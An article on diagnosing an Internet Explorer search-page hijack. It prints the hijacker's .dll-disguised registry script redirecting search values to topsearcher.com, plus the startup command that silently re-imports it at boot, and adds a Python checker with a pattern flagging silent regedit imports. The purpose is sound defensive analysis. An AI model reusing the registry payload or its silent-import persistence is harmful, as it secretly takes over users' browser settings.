A fellow by the name of Peter had a problem recently. His default search page for Internet Explorer had been hijacked. His default search page was being switched from his preferred settings to where it would point to a search engine site, http://www.topsearcher.com/ie/. He would change the setting back, but it would get reset every time he rebooted. He finally turned to the GRC newsgroups for help with this exasperating problem. When he posted a reply about an entry that he found in MSCONFIG, I strongly suspected that I was looking at the culprit:

If I look at msconfig, under startup, there is an entry that reads as follows.

sp regedit -s C:\windows\sp.dll
has this anything to do with it?
Peter

That is a command-line invocation of regedit; the -s switch tells it to import a registry script silently, without prompting the user. I asked him to email me the file (sp.dll) that was mentioned, which he did. Despite its .dll extension, the file is a plain-text registry script (the REGEDIT4 header gives it away). Take a look at its contents:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.topsearcher.com/ie/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="http://www.topsearcher.com/ie/"
"Search Page"="http://www.topsearcher.com/ie/"
"Search Bar"="http://www.topsearcher.com/ie/"
"SearchURL"="http://www.topsearcher.com/ie/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.topsearcher.com/ie/"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.topsearcher.com/ie/"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.topsearcher.com/ie/"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main]
"Search Page"="http://www.topsearcher.com/ie/"
"Default_Search_URL"="http://www.topsearcher.com/ie/"
"Search Bar"="http://www.topsearcher.com/ie/"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.topsearcher.com/ie/"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window_Placement"=hex:2c,00,00,00,02,00,00,00,03,00,00,00,b8,0b,00,00,b8,0b,00,00,fc,ff,ff,ff,fc,ff,ff,ff,51,00,
00,00,51,00,00,00,a9,02,00,00,e5,01,00,00

[HKEY_CURRENT_USER\Software\Micrsoft\Internet Explorer\Toolbar\WebBrowser]
"ITBarLayout"=hex:11,00,00,00,4c,00,00,00,00,00,00,00,10,00,00,00,1f,00,00,00,7c,00,00,00,01,00,00,00,a0,02,00,
00,2b,01,00,00,05,00,00,00,62,00,00,00,26,00,00,00,02,00,00,00,a1,02,00,00,c8,00,00,00,04,00,00,00,a1,00,00,00,
c7,01,00,00,03,00,00,00,a1,02,00,00,cf,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,24,d0,30,81,6a,d0,11,82,74,00,c0,4f,d5,ae,38,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00

That MSCONFIG entry is nothing more than a startup instruction placed into the registry to run regedit with that command parameter on every boot. Each time it runs, it silently loads all of the values above back into the registry, overwriting the settings that Peter had reset over and over. He reports that since unchecking that entry in MSCONFIG, the hijacking has ceased. :)
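The two checks a defender wants after reading this are (1) does a registry script rewrite the Internet Explorer search values to a site I do not recognise, and (2) does any startup entry silently re-import a registry script. The following script is an added example, not code from the article or from SpywareInfo; it parses REGEDIT4-style text into keys and values, flags the IE search values shown above when they point at a host outside a trusted list, and flags startup command lines that invoke regedit with the -s or /s switch. The sample registry text, the trusted-host list and the startup entries are constructed for the example (the "sp" entry reproduces the one Peter found).

```python
import re
from urllib.parse import urlparse

# Constructed sample: a trimmed copy of the kind of registry script shown in the
# article.  Real .reg files mark a continued hex: line with a trailing backslash.
SAMPLE_REG = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="http://www.topsearcher.com/ie/"
"Search Page"="http://www.topsearcher.com/ie/"
"Window_Placement"=hex:2c,00,00,00,02,00,00,00,\
  03,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.topsearcher.com/ie/"
"""

# Constructed startup entries (name -> command line) as MSCONFIG would list them.
STARTUP_ENTRIES = {
    "sp": r"regedit -s C:\windows\sp.dll",   # the entry from the article
    "Tray": r"C:\WINDOWS\systray.exe",       # benign placeholder
}

# IE value names that the script in the article rewrites.
SEARCH_VALUES = {"SearchURL", "Default_Search_URL", "Search Page",
                 "Search Bar", "SearchAssistant"}

# "name"=data  or  @=data  (default value)
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')

# regedit[.exe] ... -s|/s : silent import, no confirmation dialog
SILENT_REGEDIT_RE = re.compile(r'(?i)\bregedit(?:\.exe)?\b.*\s[-/]s(?:\s|$)')


def _unescape(s):
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg(text):
    """Parse REGEDIT4/5 text into {key_path: {value_name: data}}.
    String data is unquoted; hex:/dword: data is kept as the raw token."""
    # First join continuation lines (trailing backslash).
    joined = []
    for raw in text.splitlines():
        line = raw.rstrip()
        if joined and joined[-1].endswith("\\"):
            joined[-1] = joined[-1][:-1] + line.strip()
        else:
            joined.append(line)

    result, current = {}, None
    for line in joined:
        line = line.strip()
        if (not line or line.startswith(";")
                or line.upper().startswith("REGEDIT")
                or line.startswith("Windows Registry Editor")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = "@" if m.group(2) else _unescape(m.group(1))
            data = m.group(3).strip()
            if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                data = _unescape(data[1:-1])
            result[current][name] = data
    return result


def find_search_hijacks(reg, trusted_hosts):
    """Return (key, value_name, url) for IE search values pointing outside trusted_hosts."""
    hits = []
    for key, values in reg.items():
        if "Internet Explorer" not in key:
            continue
        for name, data in values.items():
            if name in SEARCH_VALUES:
                host = (urlparse(data).hostname or "").lower()
                if host not in trusted_hosts:
                    hits.append((key, name, data))
    return hits


def flag_startup_entries(entries):
    """Return the names of startup entries that run a silent regedit import."""
    return [name for name, cmd in entries.items() if SILENT_REGEDIT_RE.search(cmd)]


if __name__ == "__main__":
    trusted = {"www.microsoft.com", "search.msn.com"}   # constructed allow-list
    for key, name, url in find_search_hijacks(parse_reg(SAMPLE_REG), trusted):
        print(f"search value rewritten: [{key}] {name} -> {url}")
    for name in flag_startup_entries(STARTUP_ENTRIES):
        print(f"startup entry runs a silent registry import: {name} = {STARTUP_ENTRIES[name]}")
```

Unchecking the entry in MSCONFIG stops the re-import, but the values already written stay in place until they are reset; running the first check against the imported script tells you exactly which keys to put back, and it works just as well on a script that hides behind an unrelated extension such as .dll.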
